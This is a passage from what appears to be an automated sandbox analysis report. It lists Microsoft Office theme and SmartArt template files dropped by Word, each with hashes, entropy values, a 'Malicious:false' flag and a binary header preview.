                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):1463634
                                        Entropy (8bit):7.898382456989258
                                        Encrypted:false
                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2218943
                                        Entropy (8bit):7.942378408801199
                                        Encrypted:false
                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                        Malicious:false
                                        Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1750795
                                        Entropy (8bit):7.892395931401988
                                        Encrypted:false
                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                        MD5:529795E0B55926752462CBF32C14E738
                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2924237
                                        Entropy (8bit):7.970803022812704
                                        Encrypted:false
                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                        Malicious:false
                                        Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2357051
                                        Entropy (8bit):7.929430745829162
                                        Encrypted:false
                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3611324
                                        Entropy (8bit):7.965784120725206
                                        Encrypted:false
                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1091485
                                        Entropy (8bit):7.906659368807194
                                        Encrypted:false
                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                        MD5:2192871A20313BEC581B277E405C6322
                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                        Malicious:false
                                        Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):608122
                                        Entropy (8bit):7.729143855239127
                                        Encrypted:false
                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                        MD5:8BA551EEC497947FC39D1D48EC868B54
                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                        Malicious:false
                                        Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5783
                                        Entropy (8bit):7.88616857639663
                                        Encrypted:false
                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                        Malicious:false
                                        Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4026
                                        Entropy (8bit):7.809492693601857
                                        Encrypted:false
                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                        Malicious:false
                                        Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4243
                                        Entropy (8bit):7.824383764848892
                                        Encrypted:false
                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                        Malicious:false
                                        Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):16806
                                        Entropy (8bit):7.9519793977093505
                                        Encrypted:false
                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):11380
                                        Entropy (8bit):7.891971054886943
                                        Encrypted:false
                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):6024
                                        Entropy (8bit):7.886254023824049
                                        Encrypted:false
